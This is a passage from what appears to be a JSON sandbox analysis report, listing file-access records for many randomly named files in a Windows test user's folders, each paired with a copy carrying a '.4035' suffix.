7lfsqb0g\\desktop\\nyr8aikjyefl.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\o3YC8FdDp.flv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\o3yc8fddp.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\o3YC8FdDp.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\o3yc8fddp.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\p8fQECmj7Fl OF85VPf.flv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\p8fqecmj7fl of85vpf.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\p8fQECmj7Fl OF85VPf.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\p8fqecmj7fl of85vpf.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\R-vsD.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\r-vsd.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\R-vsD.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\r-vsd.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\S0BfBv4vm.mp4.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\s0bfbv4vm.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\S0BfBv4vm.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\s0bfbv4vm.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\TQbrwrS.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\tqbrwrs.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\TQbrwrS.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\tqbrwrs.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\Ue-5ySQ.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\ue-5ysq.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\Ue-5ySQ.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\ue-5ysq.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\wDgOCV.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\wdgocv.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\wDgOCV.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\wdgocv.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\XGIwR5NL7Yf.mkv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\xgiwr5nl7yf.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\XGIwR5NL7Yf.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\xgiwr5nl7yf.mkv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\xVd4Iv6FFRlHm-y.avi.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\xvd4iv6ffrlhm-y.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\xVd4Iv6FFRlHm-y.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\xvd4iv6ffrlhm-y.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\XygQlHZL_mJ.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\xygqlhzl_mj.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\XygQlHZL_mJ.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\xygqlhzl_mj.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\yVOJ0 snGOZEZV.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\yvoj0 sngozezv.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\yVOJ0 snGOZEZV.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\yvoj0 sngozezv.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\zmhb.flv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\zmhb.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\zmhb.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\zmhb.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\ZXoBFBOcUzmMPH9OMtZs.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\zxobfbocuzmmph9omtzs.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\ZXoBFBOcUzmMPH9OMtZs.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\zxobfbocuzmmph9omtzs.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\_bryI2jV2VxGI68s0d.odt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\_bryi2jv2vxgi68s0d.odt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\_bryI2jV2VxGI68s0d.odt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\_bryi2jv2vxgi68s0d.odt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\PJQ-Ty1kQqwR93pNDG\\-RTPz3hqk.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\pjq-ty1kqqwr93pndg\\-rtpz3hqk.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\PJQ-Ty1kQqwR93pNDG\\-RTPz3hqk.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\pjq-ty1kqqwr93pndg\\-rtpz3hqk.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\PJQ-Ty1kQqwR93pNDG\\4rUxzvGW0OpQV4gw u5n.flv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\pjq-ty1kqqwr93pndg\\4ruxzvgw0opqv4gw u5n.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\PJQ-Ty1kQqwR93pNDG\\4rUxzvGW0OpQV4gw u5n.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\pjq-ty1kqqwr93pndg\\4ruxzvgw0opqv4gw u5n.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\PJQ-Ty1kQqwR93pNDG\\BXbEGs1IeVQlccK0F.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\pjq-ty1kqqwr93pndg\\bxbegs1ievqlcck0f.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\PJQ-Ty1kQqwR93pNDG\\BXbEGs1IeVQlccK0F.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\pjq-ty1kqqwr93pndg\\bxbegs1ievqlcck0f.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\PJQ-Ty1kQqwR93pNDG\\JvRr.avi.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\pjq-ty1kqqwr93pndg\\jvrr.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\PJQ-Ty1kQqwR93pNDG\\JvRr.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\pjq-ty1kqqwr93pndg\\jvrr.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\3u3u7kCTHK.gif.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\3u3u7kcthk.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\3u3u7kCTHK.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\3u3u7kcthk.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\adbgirUxyBMJq0pOiu.avi.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\adbgiruxybmjq0poiu.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\adbgirUxyBMJq0pOiu.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\adbgiruxybmjq0poiu.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\LopyK.flv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\lopyk.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\LopyK.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\lopyk.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\LX2vm0PVBOBNtWI6.gif.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\lx2vm0pvbobntwi6.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\LX2vm0PVBOBNtWI6.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\lx2vm0pvbobntwi6.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\Mg9jqOZ12EhB4-HjFEm.gif.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\mg9jqoz12ehb4-hjfem.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\Mg9jqOZ12EhB4-HjFEm.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\mg9jqoz12ehb4-hjfem.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\p_1CkonjrNXGCwkIn3j.rtf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\p_1ckonjrnxgcwkin3j.rtf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\p_1CkonjrNXGCwkIn3j.rtf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\p_1ckonjrnxgcwkin3j.rtf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\RKQ9HZgpCj5.mp4.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\rkq9hzgpcj5.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\52bI-hhJ3zFu3m69\\RKQ9HZgpCj5.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\rkq9hzgpcj5.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\Aclviho ASldjfl.contact.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\aclviho asldjfl.contact.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\Aclviho ASldjfl.contact", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\aclviho asldjfl.contact", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\Administrator.contact.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\administrator.contact.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\Administrator.contact", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\administrator.contact", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\asdlfk poopvy.contact.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\asdlfk poopvy.contact.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\asdlfk poopvy.contact", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\asdlfk poopvy.contact", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\chucu jadnvk.contact.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\chucu jadnvk.contact.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\chucu jadnvk.contact", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\chucu jadnvk.contact", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\lulcit amkdfe.contact.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\lulcit amkdfe.contact.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\lulcit amkdfe.contact", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\lulcit amkdfe.contact", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\sikvnb huvuib.contact.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\sikvnb huvuib.contact.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Contacts\\sikvnb huvuib.contact", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\sikvnb huvuib.contact", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\4 dKhm4.doc.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\4 dkhm4.doc.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\4 dKhm4.doc", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\4 dkhm4.doc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\5QQe5_.mkv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\5qqe5_.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\5QQe5_.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\5qqe5_.mkv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\67_x5gea.ppt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\67_x5gea.ppt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\67_x5gea.ppt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\67_x5gea.ppt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\7IQFQytHlLfaVT6G.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\7iqfqythllfavt6g.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\7IQFQytHlLfaVT6G.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\7iqfqythllfavt6g.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\7Rx_YFPI7G6.avi.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\7rx_yfpi7g6.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\7Rx_YFPI7G6.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\7rx_yfpi7g6.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\92wAZIT1y.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\92wazit1y.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\92wAZIT1y.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\92wazit1y.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\BcucTO-lsFxXF.swf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\bcucto-lsfxxf.swf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\BcucTO-lsFxXF.swf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\bcucto-lsfxxf.swf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\beN0t.png.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\ben0t.png.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\beN0t.png", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\ben0t.png", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\BHMU64hzOdeWD -0.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\bhmu64hzodewd -0.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\BHMU64hzOdeWD -0.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\bhmu64hzodewd -0.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\buTh4KTP4lymd-8Q.mkv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\buth4ktp4lymd-8q.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\buTh4KTP4lymd-8Q.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\buth4ktp4lymd-8q.mkv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\cgt di.pptx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\cgt di.pptx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\cgt di.pptx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\cgt di.pptx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\CPqQ dVCpdsx.rtf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\cpqq dvcpdsx.rtf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\CPqQ dVCpdsx.rtf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\cpqq dvcpdsx.rtf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\DhyiEQ4Xj.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\dhyieq4xj.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\DhyiEQ4Xj.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\dhyieq4xj.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\E1787L5.xlsx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\e1787l5.xlsx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\E1787L5.xlsx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\e1787l5.xlsx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\EEfzaM7d2YAF.mkv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 